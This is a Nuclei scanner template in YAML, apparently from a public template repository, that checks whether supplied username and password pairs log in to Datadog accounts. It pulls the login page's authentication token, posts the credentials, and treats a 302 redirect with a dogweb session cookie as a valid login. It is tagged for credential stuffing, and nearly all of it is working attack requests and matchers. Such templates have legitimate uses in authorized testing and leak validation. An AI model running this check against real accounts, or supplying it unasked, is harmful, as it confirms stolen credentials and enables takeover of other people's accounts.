52 lines
1.2 KiB
YAML
52 lines
1.2 KiB
YAML
id: datadog-login-check
|
|
|
|
info:
|
|
name: Datadog Login Check
|
|
author: parthmalhotra, pdresearch
|
|
severity: critical
|
|
description: Checks for a valid datadog account.
|
|
reference:
|
|
- https://owasp.org/www-community/attacks/Credential_stuffing
|
|
tags: login-check,datadog,creds-stuffing
|
|
|
|
self-contained: true
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET https://app.datadoghq.com/account/login HTTP/1.1
|
|
Host: app.datadoghq.com
|
|
|
|
- |
|
|
POST https://app.datadoghq.com/account/login? HTTP/1.1
|
|
Host: app.datadoghq.com
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_authentication_token={{auth_token}}&username={{username}}&password={{password}}
|
|
|
|
|
|
cookie-reuse: true
|
|
extractors:
|
|
- type: regex
|
|
name: auth_token
|
|
part: body
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- "authentication_token": "(.*?)","
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- username
|
|
- password
|
|
|
|
attack: pitchfork
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'Set-Cookie: dogweb='
|
|
|
|
- type: status
|
|
status:
|
|
- 302 |